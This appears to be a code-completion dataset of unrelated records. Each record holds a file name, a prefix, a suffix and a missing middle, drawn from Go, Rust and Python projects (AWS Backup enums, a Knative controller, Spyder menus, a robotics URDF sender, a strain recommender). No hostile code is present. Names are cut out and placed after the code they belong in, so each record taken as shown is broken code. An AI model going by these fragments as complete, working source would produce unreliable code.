NumberOfRecoveryPoints *int64 `type:"long"`
}
// String returns the string representation
func (s VaultListMember) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s VaultListMember) GoString() string {
return s.String()
}
// SetBackupVaultArn sets the BackupVaultArn field's value.
func (s *VaultListMember) SetBackupVaultArn(v string) *VaultListMember {
s.BackupVaultArn = &v
return s
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *VaultListMember) SetBackupVaultName(v string) *VaultListMember {
s.BackupVaultName = &v
return s
}
// SetCreationDate sets the CreationDate field's value.
func (s *VaultListMember) SetCreationDate(v time.Time) *VaultListMember {
s.CreationDate = &v
return s
}
// SetCreatorRequestId sets the CreatorRequestId field's value.
func (s *VaultListMember) SetCreatorRequestId(v string) *VaultListMember {
s.CreatorRequestId = &v
return s
}
// SetEncryptionKeyArn sets the EncryptionKeyArn field's value.
func (s *VaultListMember) SetEncryptionKeyArn(v string) *VaultListMember {
s.EncryptionKeyArn = &v
return s
}
// SetNumberOfRecoveryPoints sets the NumberOfRecoveryPoints field's value.
func (s *VaultListMember) SetNumberOfRecoveryPoints(v int64) *VaultListMember {
s.NumberOfRecoveryPoints = &v
return s
}
const (
// ConditionTypeStringequals is a ConditionType enum value
ConditionTypeStringequals = "STRINGEQUALS"
)
// ConditionType_Values returns all elements of the ConditionType enum
func ConditionType_Values() []string {
return []string{
ConditionTypeStringequals,
}
}
const (
// CopyJobStateCreated is a CopyJobState enum value
CopyJobStateCreated = "CREATED"
// CopyJobStateRunning is a CopyJobState enum value
CopyJobStateRunning = "RUNNING"
// CopyJobStateCompleted is a CopyJobState enum value
CopyJobStateCompleted = "COMPLETED"
// CopyJobStateFailed is a CopyJobState enum value
CopyJobStateFailed = "FAILED"
)
// CopyJobState_Values returns all elements of the CopyJobState enum
func CopyJobState_Values() []string {
return []string{
CopyJobStateCreated,
CopyJobStateRunning,
CopyJobStateCompleted,
CopyJobStateFailed,
}
}
const (
// JobStateCreated is a JobState enum value
JobStateCreated = "CREATED"
// JobStatePending is a JobState enum value
JobStatePending = "PENDING"
// JobStateRunning is a JobState enum value
JobStateRunning = "RUNNING"
// JobStateAborting is a JobState enum value
JobStateAborting = "ABORTING"
// JobStateAborted is a JobState enum value
JobStateAborted = "ABORTED"
// JobStateCompleted is a JobState enum value
JobStateCompleted = "COMPLETED"
// JobStateFailed is a JobState enum value
JobStateFailed = "FAILED"
// JobStateExpired is a JobState enum value
JobStateExpired = "EXPIRED"
)
// JobState_Values returns all elements of the JobState enum
func JobState_Values() []string {
return []string{
JobStateCreated,
JobStatePending,
JobStateRunning,
JobStateAborting,
JobStateAborted,
JobStateCompleted,
JobStateFailed,
JobStateExpired,
}
}
const (
// RecoveryPointStatusCompleted is a RecoveryPointStatus enum value
RecoveryPointStatusCompleted = "COMPLETED"
// RecoveryPointStatusPartial is a RecoveryPointStatus enum value
RecoveryPointStatusPartial = "PARTIAL"
// RecoveryPointStatusDeleting is a RecoveryPointStatus enum value
RecoveryPointStatusDeleting = "DELETING"
// RecoveryPointStatusExpired is a RecoveryPointStatus enum value
RecoveryPointStatusExpired = "EXPIRED"
)
// RecoveryPointStatus_Values returns all elements of the RecoveryPointStatus enum
func RecoveryPointStatus_Values() []string {
return []string{
RecoveryPointStatusCompleted,
RecoveryPointStatusPartial,
RecoveryPointStatusDeleting,
RecoveryPointStatusExpired,
}
}
const (
// RestoreJobStatusPending is a RestoreJobStatus enum value
RestoreJobStatusPending = "PENDING"
// RestoreJobStatusRunning is a RestoreJobStatus enum value
RestoreJobStatusRunning = "RUNNING"
// RestoreJobStatusCompleted is a RestoreJobStatus enum value
RestoreJobStatusCompleted = "COMPLETED"
// RestoreJobStatusAborted is a RestoreJobStatus enum value
RestoreJobStatusAborted = "ABORTED"
// RestoreJobStatusFailed is a RestoreJobStatus enum value
RestoreJobStatusFailed = "FAILED"
)
// RestoreJobStatus_Values returns all elements of the RestoreJobStatus enum
func RestoreJobStatus_Values() []string {
return []string{
RestoreJobStatusPending,
RestoreJobStatusRunning,
RestoreJobStatusCompleted,
RestoreJobStatusAborted,
RestoreJobStatusFailed,
}
}
const (
// StorageClassWarm is a StorageClass enum value
StorageClassWarm = "WARM"
// StorageClassCold is a StorageClass enum value
StorageClassCold = "COLD"
// StorageClassDeleted is a StorageClass enum value
StorageClassDeleted = "DELETED"
)
// StorageClass_Values returns all elements of the StorageClass enum
func StorageClass_Values() []string {
return []string{
StorageClassWarm,
StorageClassCold,
StorageClassDeleted,
}
}
const (
// VaultEventBackupJobStarted is a VaultEvent enum value
VaultEventBackupJobStarted = "BACKUP_JOB_STARTED"
// VaultEventBackupJobCompleted is a VaultEvent enum value
VaultEventBackupJobCompleted = "BACKUP_JOB_COMPLETED"
// VaultEventBackupJobSuccessful is a VaultEvent enum value
VaultEventBackupJobSuccessful = "BACKUP_JOB_SUCCESSFUL"
// VaultEventBackupJobFailed is a VaultEvent enum value
VaultEventBackupJobFailed = "BACKUP_JOB_FAILED"
// VaultEventBackupJobExpired is a VaultEvent enum value
VaultEventBackupJobExpired = "BACKUP_JOB_EXPIRED"
// VaultEventRestoreJobStarted is a VaultEvent enum value
VaultEventRestoreJobStarted = "RESTORE_JOB_STARTED"
// VaultEventRestoreJobCompleted is a VaultEvent enum value
VaultEventRestoreJobCompleted = "RESTORE_JOB_COMPLETED"
// VaultEventRestoreJobSuccessful is a VaultEvent enum value
VaultEventRestoreJobSuccessful = "RESTORE_JOB_SUCCESSFUL"
// VaultEventRestoreJobFailed is a VaultEvent enum value
VaultEventRestoreJobFailed = "RESTORE_JOB_FAILED"
// VaultEventCopyJobStarted is a VaultEvent enum value
VaultEventCopyJobStarted = "COPY_JOB_STARTED"
// VaultEventCopyJobSuccessful is a VaultEvent enum value
VaultEventCopyJobSuccessful = "COPY_JOB_SUCCESSFUL"
// VaultEventCopyJobFailed is a VaultEvent enum value
VaultEventCopyJobFailed = "COPY_JOB_FAILED"
// VaultEventRecoveryPointModified is a VaultEvent enum value
VaultEventRecoveryPointModified = "RECOVERY_POINT_MODIFIED"
// VaultEventBackupPlanCreated is a VaultEvent enum value
VaultEventBackupPlanCreated = "BACKUP_PLAN_CREATED"
// VaultEventBackupPlanModified is a VaultEvent enum value
VaultEventBackupPlanModified = "BACKUP_PLAN_MODIFIED"
)
// VaultEvent_Values returns all elements of the VaultEvent enum
func VaultEvent_Values() []string {
return []string{
VaultEventBackupJobStarted,
VaultEventBackupJobCompleted,
VaultEventBackupJobSuccessful,
VaultEventBackupJobFailed,
VaultEventBackupJobExpired,
VaultEventRestoreJobStarted,
VaultEventRestoreJobCompleted,
VaultEventRestoreJobSuccessful,
VaultEventRestoreJobFailed,
VaultEventCopyJobStarted,
VaultEventCopyJobSuccessful,
VaultEventCopyJobFailed,
VaultEventRecoveryPointModified,
VaultEventBackupPlanCreated,
VaultEventBackupPlanModified,
}
} | } |
parser.rs | extern crate nom;
use nom::{
bytes::complete::{tag, take_while_m_n},
combinator::map_res,
sequence::tuple,
IResult,
};
pub fn execute(input: &str) | {
unimplemented!()
} |
|
cf1426D_non_zero_segments.rs | // Vicfred & uninhm
// https://codeforces.com/contest/1426/problem/D
// greedy
use std::io::stdin;
use std::collections::BTreeSet;
fn | () {
let mut line = String::new();
stdin().read_line(&mut line).unwrap();
let n: i64 = line.trim().parse().unwrap();
line = String::new();
stdin().read_line(&mut line).unwrap();
let a: Vec<i64> = line
.split_whitespace()
.map(|x| x.parse().unwrap())
.collect();
let mut rbt = BTreeSet::new();
let mut prefix: i64 = 0;
let mut ans: i64 = 0;
rbt.insert(0);
for x in a {
prefix += x;
if rbt.contains(&prefix) {
ans += 1;
rbt.clear();
rbt.insert(0);
prefix = x;
}
rbt.insert(prefix);
}
println!("{}", ans);
}
| main |
test_ai.py | import pytest
from katrain.core.constants import AI_STRATEGIES_RECOMMENDED_ORDER, AI_STRATEGIES
class TestAI:
def test_order(self):
| assert set(AI_STRATEGIES_RECOMMENDED_ORDER) == set(AI_STRATEGIES) |
|
controller.go | /*
Copyright 2021 Google LLC
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
// Code generated by injection-gen. DO NOT EDIT.
package broker
import (
context "context"
fmt "fmt"
reflect "reflect"
strings "strings"
versionedscheme "github.com/google/knative-gcp/pkg/client/clientset/versioned/scheme"
client "github.com/google/knative-gcp/pkg/client/injection/client"
broker "github.com/google/knative-gcp/pkg/client/injection/informers/broker/v1beta1/broker"
zap "go.uber.org/zap"
corev1 "k8s.io/api/core/v1"
labels "k8s.io/apimachinery/pkg/labels"
types "k8s.io/apimachinery/pkg/types"
watch "k8s.io/apimachinery/pkg/watch"
scheme "k8s.io/client-go/kubernetes/scheme"
v1 "k8s.io/client-go/kubernetes/typed/core/v1"
record "k8s.io/client-go/tools/record"
kubeclient "knative.dev/pkg/client/injection/kube/client"
controller "knative.dev/pkg/controller"
logging "knative.dev/pkg/logging"
logkey "knative.dev/pkg/logging/logkey"
reconciler "knative.dev/pkg/reconciler"
)
const (
defaultControllerAgentName = "broker-controller"
defaultFinalizerName = "brokers.eventing.knative.dev"
// ClassAnnotationKey points to the annotation for the class of this resource.
ClassAnnotationKey = "eventing.knative.dev/broker.class"
)
// NewImpl returns a controller.Impl that handles queuing and feeding work from
// the queue through an implementation of controller.Reconciler, delegating to
// the provided Interface and optional Finalizer methods. OptionsFn is used to return
// controller.Options to be used by the internal reconciler.
func | (ctx context.Context, r Interface, classValue string, optionsFns ...controller.OptionsFn) *controller.Impl {
logger := logging.FromContext(ctx)
// Check the options function input. It should be 0 or 1.
if len(optionsFns) > 1 {
logger.Fatal("Up to one options function is supported, found: ", len(optionsFns))
}
brokerInformer := broker.Get(ctx)
lister := brokerInformer.Lister()
rec := &reconcilerImpl{
LeaderAwareFuncs: reconciler.LeaderAwareFuncs{
PromoteFunc: func(bkt reconciler.Bucket, enq func(reconciler.Bucket, types.NamespacedName)) error {
all, err := lister.List(labels.Everything())
if err != nil {
return err
}
for _, elt := range all {
// TODO: Consider letting users specify a filter in options.
enq(bkt, types.NamespacedName{
Namespace: elt.GetNamespace(),
Name: elt.GetName(),
})
}
return nil
},
},
Client: client.Get(ctx),
Lister: lister,
reconciler: r,
finalizerName: defaultFinalizerName,
classValue: classValue,
}
ctrType := reflect.TypeOf(r).Elem()
ctrTypeName := fmt.Sprintf("%s.%s", ctrType.PkgPath(), ctrType.Name())
ctrTypeName = strings.ReplaceAll(ctrTypeName, "/", ".")
logger = logger.With(
zap.String(logkey.ControllerType, ctrTypeName),
zap.String(logkey.Kind, "eventing.knative.dev.Broker"),
)
impl := controller.NewImpl(rec, logger, ctrTypeName)
agentName := defaultControllerAgentName
// Pass impl to the options. Save any optional results.
for _, fn := range optionsFns {
opts := fn(impl)
if opts.ConfigStore != nil {
rec.configStore = opts.ConfigStore
}
if opts.FinalizerName != "" {
rec.finalizerName = opts.FinalizerName
}
if opts.AgentName != "" {
agentName = opts.AgentName
}
if opts.SkipStatusUpdates {
rec.skipStatusUpdates = true
}
if opts.DemoteFunc != nil {
rec.DemoteFunc = opts.DemoteFunc
}
}
rec.Recorder = createRecorder(ctx, agentName)
return impl
}
func createRecorder(ctx context.Context, agentName string) record.EventRecorder {
logger := logging.FromContext(ctx)
recorder := controller.GetEventRecorder(ctx)
if recorder == nil {
// Create event broadcaster
logger.Debug("Creating event broadcaster")
eventBroadcaster := record.NewBroadcaster()
watches := []watch.Interface{
eventBroadcaster.StartLogging(logger.Named("event-broadcaster").Infof),
eventBroadcaster.StartRecordingToSink(
&v1.EventSinkImpl{Interface: kubeclient.Get(ctx).CoreV1().Events("")}),
}
recorder = eventBroadcaster.NewRecorder(scheme.Scheme, corev1.EventSource{Component: agentName})
go func() {
<-ctx.Done()
for _, w := range watches {
w.Stop()
}
}()
}
return recorder
}
func init() {
versionedscheme.AddToScheme(scheme.Scheme)
}
| NewImpl |
menus.py | # -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""
Spyder API menu widgets.
"""
# Standard library imports
import sys
from typing import Optional, Union, TypeVar
# Third party imports
from qtpy.QtWidgets import QAction, QMenu
# Local imports
from spyder.utils.qthelpers import add_actions, SpyderAction
# --- Constants
# ----------------------------------------------------------------------------
MENU_SEPARATOR = None
# Generic type annotations
T = TypeVar('T', bound='SpyderMenu')
class OptionsMenuSections:
Top = 'top_section'
Bottom = 'bottom_section'
class P |
Context = 'context_menu'
Options = 'options_menu'
# --- Widgets
# ----------------------------------------------------------------------------
class SpyderMenu(QMenu):
"""
A QMenu subclass to implement additional functionality for Spyder.
"""
MENUS = []
def __init__(self, parent=None, title=None, dynamic=True,
menu_id=None):
self._parent = parent
self._title = title
self._sections = []
self._actions = []
self._actions_map = {}
self.unintroduced_actions = {}
self.unintroduced_sections = []
self._dirty = False
self.menu_id = menu_id
if title is None:
super().__init__(parent)
else:
super().__init__(title, parent)
self.MENUS.append((parent, title, self))
if sys.platform == 'darwin' and dynamic:
# Needed to enable the dynamic population of actions in menus
# in the aboutToShow signal
# See spyder-ide/spyder#14612
self.addAction(QAction(self))
self.aboutToShow.connect(self._render)
def clear_actions(self):
"""
Remove actions from the menu (including custom references)
Returns
-------
None.
"""
self.clear()
self._sections = []
self._actions = []
self._actions_map = {}
self.unintroduced_actions = {}
self.unintroduced_sections = []
def add_action(self: T, action: Union[SpyderAction, T],
section: Optional[str] = None,
before: Optional[str] = None,
before_section: Optional[str] = None,
check_before: bool = True,
omit_id: bool = False):
"""
Add action to a given menu section.
Parameters
----------
action: SpyderAction
The action to add.
section: str or None
The section id in which to insert the `action`.
before: str
Make the action appear before the given action identifier.
before_section: str or None
Make the item section (if provided) appear before another
given section.
check_before: bool
Check if the `before` action is part of the menu. This is
necessary to avoid an infinite recursion when adding
unintroduced actions with this method again.
omit_id: bool
If True, then the menu will check if the item to add declares an
id, False otherwise. This flag exists only for items added on
Spyder 4 plugins. Default: False
"""
item_id = None
if isinstance(action, SpyderAction) or hasattr(action, 'action_id'):
item_id = action.action_id
elif isinstance(action, SpyderMenu) or hasattr(action, 'menu_id'):
item_id = action.menu_id
if not omit_id and item_id is None and action is not None:
raise AttributeError(f'Item {action} must declare an id.')
if before is None:
self._actions.append((section, action))
else:
new_actions = []
added = False
before_item = self._actions_map.get(before, None)
for sec, act in self._actions:
if before_item is not None and act == before_item:
added = True
new_actions.append((section, action))
new_actions.append((sec, act))
# Actions can't be added to the menu if the `before` action is
# not part of it yet. That's why we need to save them in the
# `unintroduced_actions` dict, so we can add them again when
# the menu is rendered.
if not added and check_before:
before_actions = self.unintroduced_actions.get(before, [])
before_actions.append((section, action))
self.unintroduced_actions[before] = before_actions
self._actions = new_actions
if before_section is not None:
if before_section in self._sections:
self._update_sections(section, before_section)
else:
# If `before_section` has not been introduced yet to the menu,
# we save `section` to introduce it when the menu is rendered.
if (section, before_section) not in self.unintroduced_sections:
self.unintroduced_sections.append(
(section, before_section)
)
elif section not in self._sections:
self._sections.append(section)
# Track state of menu to avoid re-rendering if menu has not changed
self._dirty = True
self._actions_map[item_id] = action
def get_title(self):
"""
Return the title for menu.
"""
return self._title
def get_actions(self):
"""
Return a parsed list of menu actions.
Includes MENU_SEPARATOR taking into account the sections defined.
"""
actions = []
for section in self._sections:
for (sec, action) in self._actions:
if sec == section:
actions.append(action)
actions.append(MENU_SEPARATOR)
return actions
def get_sections(self):
"""
Return a tuple of menu sections.
"""
return tuple(self._sections)
def _render(self):
"""
Create the menu prior to showing it. This takes into account sections
and location of menus.
"""
if self._dirty:
self.clear()
# Iterate over unintroduced sections until all of them have been
# introduced.
iter_sections = iter(self.unintroduced_sections)
while len(self.unintroduced_sections) > 0:
section, before_section = next(iter_sections)
self._update_sections(section, before_section)
# If section was introduced, remove it from the list and
# update iterator.
if section in self._sections:
self.unintroduced_sections.remove(
(section, before_section)
)
iter_sections = iter(self.unintroduced_sections)
# Update actions with those that were not introduced because
# a `before` action they required was not part of the menu yet.
for before, actions in self.unintroduced_actions.items():
for section, action in actions:
self.add_action(action, section=section,
before=before, check_before=False)
actions = self.get_actions()
add_actions(self, actions)
self._dirty = False
def _update_sections(self, section, before_section):
"""Update sections ordering."""
new_sections = []
for sec in self._sections:
if sec == before_section:
new_sections.append(section)
if sec != section:
new_sections.append(sec)
self._sections = new_sections
class MainWidgetMenu(SpyderMenu):
"""
This menu fixes the bottom section of the options menu.
"""
def _render(self):
"""
Create the menu prior to showing it. This takes into account sections
and location of menus. It also hides consecutive separators if found.
"""
if self._dirty:
self.clear()
bottom = OptionsMenuSections.Bottom
actions = []
for section in self._sections:
for (sec, action) in self._actions:
if sec == section and sec != bottom:
actions.append(action)
actions.append(MENU_SEPARATOR)
# Add bottom actions
for (sec, action) in self._actions:
if sec == bottom:
actions.append(action)
add_actions(self, actions)
self._dirty = False
| luginMainWidgetMenus: |
alphabet_subsequence.py |
def alphabet_subsequence_two(s):
""" I like this solution better.
Clear and concise
"""
return all(s[i]<s[i+1] for i in range(len(s) -1))
if __name__ == '__main__':
s = 'effg'
print(alphabet_subsequence(s)) | def alphabet_subsequence(s):
return ''.join(sorted(s)) == s and len(set(s)) == len(s)
|
|
specs_test.py | # Copyright 2017 The dm_control Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for specs."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Internal dependencies.
from absl.testing import absltest
from dm_control.rl import specs as array_spec
import numpy as np
import six
class ArraySpecTest(absltest.TestCase):
def testShapeTypeError(self):
with self.assertRaises(TypeError):
array_spec.ArraySpec(32, np.int32)
def testDtypeTypeError(self):
with self.assertRaises(TypeError):
array_spec.ArraySpec((1, 2, 3), "32")
def testStringDtype(self):
array_spec.ArraySpec((1, 2, 3), "int32")
def | (self):
array_spec.ArraySpec((1, 2, 3), np.int32)
def testDtype(self):
spec = array_spec.ArraySpec((1, 2, 3), np.int32)
self.assertEqual(np.int32, spec.dtype)
def testShape(self):
spec = array_spec.ArraySpec([1, 2, 3], np.int32)
self.assertEqual((1, 2, 3), spec.shape)
def testEqual(self):
spec_1 = array_spec.ArraySpec((1, 2, 3), np.int32)
spec_2 = array_spec.ArraySpec((1, 2, 3), np.int32)
self.assertEqual(spec_1, spec_2)
def testNotEqualDifferentShape(self):
spec_1 = array_spec.ArraySpec((1, 2, 3), np.int32)
spec_2 = array_spec.ArraySpec((1, 3, 3), np.int32)
self.assertNotEqual(spec_1, spec_2)
def testNotEqualDifferentDtype(self):
spec_1 = array_spec.ArraySpec((1, 2, 3), np.int64)
spec_2 = array_spec.ArraySpec((1, 2, 3), np.int32)
self.assertNotEqual(spec_1, spec_2)
def testNotEqualOtherClass(self):
spec_1 = array_spec.ArraySpec((1, 2, 3), np.int32)
spec_2 = None
self.assertNotEqual(spec_1, spec_2)
self.assertNotEqual(spec_2, spec_1)
spec_2 = ()
self.assertNotEqual(spec_1, spec_2)
self.assertNotEqual(spec_2, spec_1)
def testIsUnhashable(self):
spec = array_spec.ArraySpec(shape=(1, 2, 3), dtype=np.int32)
with self.assertRaisesRegexp(TypeError, "unhashable type"):
hash(spec)
def testValidateDtype(self):
spec = array_spec.ArraySpec((1, 2), np.int32)
spec.validate(np.zeros((1, 2), dtype=np.int32))
with self.assertRaises(ValueError):
spec.validate(np.zeros((1, 2), dtype=np.float32))
def testValidateShape(self):
spec = array_spec.ArraySpec((1, 2), np.int32)
spec.validate(np.zeros((1, 2), dtype=np.int32))
with self.assertRaises(ValueError):
spec.validate(np.zeros((1, 2, 3), dtype=np.int32))
def testGenerateValue(self):
spec = array_spec.ArraySpec((1, 2), np.int32)
test_value = spec.generate_value()
spec.validate(test_value)
class BoundedArraySpecTest(absltest.TestCase):
def testInvalidMinimum(self):
with six.assertRaisesRegex(self, ValueError, "not compatible"):
array_spec.BoundedArraySpec((3, 5), np.uint8, (0, 0, 0), (1, 1))
def testInvalidMaximum(self):
with six.assertRaisesRegex(self, ValueError, "not compatible"):
array_spec.BoundedArraySpec((3, 5), np.uint8, 0, (1, 1, 1))
def testMinMaxAttributes(self):
spec = array_spec.BoundedArraySpec((1, 2, 3), np.float32, 0, (5, 5, 5))
self.assertEqual(type(spec.minimum), np.ndarray)
self.assertEqual(type(spec.maximum), np.ndarray)
def testNotWriteable(self):
spec = array_spec.BoundedArraySpec((1, 2, 3), np.float32, 0, (5, 5, 5))
with six.assertRaisesRegex(self, ValueError, "read-only"):
spec.minimum[0] = -1
with six.assertRaisesRegex(self, ValueError, "read-only"):
spec.maximum[0] = 100
def testEqualBroadcastingBounds(self):
spec_1 = array_spec.BoundedArraySpec(
(1, 2), np.int32, minimum=0.0, maximum=1.0)
spec_2 = array_spec.BoundedArraySpec(
(1, 2), np.int32, minimum=[0.0, 0.0], maximum=[1.0, 1.0])
self.assertEqual(spec_1, spec_2)
def testNotEqualDifferentMinimum(self):
spec_1 = array_spec.BoundedArraySpec(
(1, 2), np.int32, minimum=[0.0, -0.6], maximum=[1.0, 1.0])
spec_2 = array_spec.BoundedArraySpec(
(1, 2), np.int32, minimum=[0.0, 0.0], maximum=[1.0, 1.0])
self.assertNotEqual(spec_1, spec_2)
def testNotEqualOtherClass(self):
spec_1 = array_spec.BoundedArraySpec(
(1, 2), np.int32, minimum=[0.0, -0.6], maximum=[1.0, 1.0])
spec_2 = array_spec.ArraySpec((1, 2), np.int32)
self.assertNotEqual(spec_1, spec_2)
self.assertNotEqual(spec_2, spec_1)
spec_2 = None
self.assertNotEqual(spec_1, spec_2)
self.assertNotEqual(spec_2, spec_1)
spec_2 = ()
self.assertNotEqual(spec_1, spec_2)
self.assertNotEqual(spec_2, spec_1)
def testNotEqualDifferentMaximum(self):
spec_1 = array_spec.BoundedArraySpec(
(1, 2), np.int32, minimum=0.0, maximum=2.0)
spec_2 = array_spec.BoundedArraySpec(
(1, 2), np.int32, minimum=[0.0, 0.0], maximum=[1.0, 1.0])
self.assertNotEqual(spec_1, spec_2)
def testIsUnhashable(self):
spec = array_spec.BoundedArraySpec(
shape=(1, 2), dtype=np.int32, minimum=0.0, maximum=2.0)
with self.assertRaisesRegexp(TypeError, "unhashable type"):
hash(spec)
def testRepr(self):
as_string = repr(array_spec.BoundedArraySpec(
(1, 2), np.int32, minimum=101.0, maximum=73.0))
self.assertIn("101", as_string)
self.assertIn("73", as_string)
def testValidateBounds(self):
spec = array_spec.BoundedArraySpec((2, 2), np.int32, minimum=5, maximum=10)
spec.validate(np.array([[5, 6], [8, 10]], dtype=np.int32))
with self.assertRaises(ValueError):
spec.validate(np.array([[5, 6], [8, 11]], dtype=np.int32))
with self.assertRaises(ValueError):
spec.validate(np.array([[4, 6], [8, 10]], dtype=np.int32))
def testGenerateValue(self):
spec = array_spec.BoundedArraySpec((2, 2), np.int32, minimum=5, maximum=10)
test_value = spec.generate_value()
spec.validate(test_value)
def testScalarBounds(self):
spec = array_spec.BoundedArraySpec((), np.float, minimum=0.0, maximum=1.0)
self.assertIsInstance(spec.minimum, np.ndarray)
self.assertIsInstance(spec.maximum, np.ndarray)
# Sanity check that numpy compares correctly to a scalar for an empty shape.
self.assertEqual(0.0, spec.minimum)
self.assertEqual(1.0, spec.maximum)
# Check that the spec doesn't fail its own input validation.
_ = array_spec.BoundedArraySpec(
spec.shape, spec.dtype, spec.minimum, spec.maximum)
if __name__ == "__main__":
absltest.main()
| testNumpyDtype |
send_urdf_fragment.py | #!/usr/bin/env python3
# Copyright (c) 2013-2018, Rethink Robotics Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import argparse
import rospy
import xacro
from intera_core_msgs.msg import (
URDFConfiguration,
)
def xacro_parse(filename):
doc = xacro.parse(None, filename)
xacro.process_doc(doc, in_order=True)
return doc.toprettyxml(indent=' ')
def send_urdf(parent_link, root_joint, urdf_filename, duration):
"""
Send the URDF Fragment located at the specified path.
@param parent_link: parent link to attach the URDF fragment to
(usually <side>_hand)
@param root_joint: root link of the URDF fragment (usually <side>_gripper_base)
@param urdf_filename: path to the urdf XML file to load into xacro and send
@param duration: duration to repeat sending the URDF to ensure it is received
"""
msg = URDFConfiguration()
# The updating the time parameter tells
# the robot that this is a new configuration.
# Only update the time when an updated internal
# model is required. Do not continuously update
# the time parameter.
msg.time = rospy.Time.now()
# link to attach this urdf to onboard the robot
msg.link = parent_link
# root linkage in your URDF Fragment
msg.joint = root_joint
msg.urdf = xacro_parse(urdf_filename)
# print("Publishing URDF: ", msg.urdf)
pub = rospy.Publisher('/robot/urdf', URDFConfiguration, queue_size=10)
rate = rospy.Rate(5) # 5hz
start = rospy.Time.now()
while not rospy.is_shutdown():
pub.publish(msg)
rate.sleep()
if (rospy.Time.now() - msg.time) > rospy.Duration(duration):
break
def main():
|
if __name__ == '__main__':
sys.exit(main())
| """RSDK URDF Fragment Example:
This example shows a proof of concept for
adding your URDF fragment to the robot's
onboard URDF (which is currently in use).
"""
arg_fmt = argparse.RawDescriptionHelpFormatter
parser = argparse.ArgumentParser(formatter_class=arg_fmt,
description=main.__doc__)
required = parser.add_argument_group('required arguments')
required.add_argument(
'-f', '--file', metavar='PATH', required=True,
help='Path to URDF file to send'
)
required.add_argument(
'-l', '--link', required=False, default="right_hand",
help='URDF Link already to attach fragment to (usually <left/right>_hand)'
)
required.add_argument(
'-j', '--joint', required=False, default="right_gripper_base",
help='Root joint for fragment (usually <left/right>_gripper_base)'
)
parser.add_argument("-d", "--duration", type=lambda t:abs(float(t)),
default=5.0, help="[in seconds] Duration to publish fragment")
args = parser.parse_args(rospy.myargv()[1:])
rospy.init_node('rsdk_configure_urdf', anonymous=True)
if not os.access(args.file, os.R_OK):
rospy.logerr("Cannot read file at '%s'" % (args.file,))
return 1
send_urdf(args.link, args.joint, args.file, args.duration)
return 0 |
recommender_vanilla.py | import numpy as np
import pandas as pd
from sklearn.neighbors import NearestNeighbors
from sklearn.feature_extraction.text import CountVectorizer
### Import and shape data
path_base = 'gitstuff/buildweek2/DS--Data-Engineering-/'
df = pd.read_csv(path_base + 'data/cannabis.csv')
## select subset with high rating
good_enough = df[df['Rating'] >= 4.0]
## replace blank flavor with ""
good_enough = df.replace(np.nan, '', regex=True)
def | (strng):
"""Remove commas and parentheses."""
s = strng.replace(","," ") # comma-> space
s = s.replace("("," ") # (-> space
s = s.replace(")"," ") # (-> space
s = s.lower()
return s
## Clean and concatenate som fields to build strings for creating an embedding.
cols = ['Type', 'Effects', 'Flavor', 'Description']
for col in cols:
good_enough[col] = good_enough[col].apply(clean_string)
good_enough['text'] = good_enough['Type'] + " " + good_enough['Effects'] + " " + good_enough['Flavor']
## Define a function to create a list of docs to be used to create a sparse matrix.
def gather_docs(df):
""" Produces List of Documents from a dataframe.
df: a Pandas dataframe that has the column 'text'.
Returns a list of strings.
"""
docs = list(df['text'])
return docs
docs = gather_docs(good_enough)
## Instantiate vectorizer
vect = CountVectorizer(stop_words='english', max_features=1000)
## Fit Vectorizer
vect.fit(docs)
## Create a sparse document-term matrix
dtm = vect.transform(docs)
## Make a dataframe of a condensed version of the DTM, using feature names
dtm = pd.DataFrame(dtm.todense(), columns=vect.get_feature_names())
## Instantiate Nearestneighbors
nn = NearestNeighbors(n_neighbors=5, algorithm='kd_tree')
## Fit on Document-Term Matrix
nn.fit(dtm)
def recommend(txt):
""" Receives a string containing strain, effects, and flavors, and
returns a 2-tuple of (array of scores, array of indexes) describing
the best matches among strains modeled."""
clean_text = clean_string(txt)
transformed_text = vect.transform([clean_text])
return nn.kneighbors(transformed_text.todense()) | clean_string |
fn_transform.rs | use std::marker::PhantomData;
use futures::future::{ok, FutureResult};
use futures::IntoFuture;
use crate::{Apply, IntoTransform, Service, Transform};
/// Use function as transform service
pub fn fn_transform<F, S, In, Out, Err>(
f: F,
) -> impl Transform<S, Request = In, Response = Out::Item, Error = Out::Error, InitError = Err>
where
S: Service,
F: FnMut(In, &mut S) -> Out + Clone,
Out: IntoFuture,
Out::Error: From<S::Error>,
{
FnTransform::new(f)
}
pub struct FnTransform<F, S, In, Out, Err>
where
F: FnMut(In, &mut S) -> Out + Clone,
Out: IntoFuture,
{
f: F,
_t: PhantomData<(S, In, Out, Err)>,
}
impl<F, S, In, Out, Err> FnTransform<F, S, In, Out, Err>
where
F: FnMut(In, &mut S) -> Out + Clone,
Out: IntoFuture,
{
pub fn new(f: F) -> Self {
FnTransform { f, _t: PhantomData }
}
}
impl<F, S, In, Out, Err> Transform<S> for FnTransform<F, S, In, Out, Err>
where
S: Service,
F: FnMut(In, &mut S) -> Out + Clone,
Out: IntoFuture,
Out::Error: From<S::Error>,
{
type Request = In;
type Response = Out::Item;
type Error = Out::Error;
type Transform = Apply<S, F, In, Out>;
type InitError = Err;
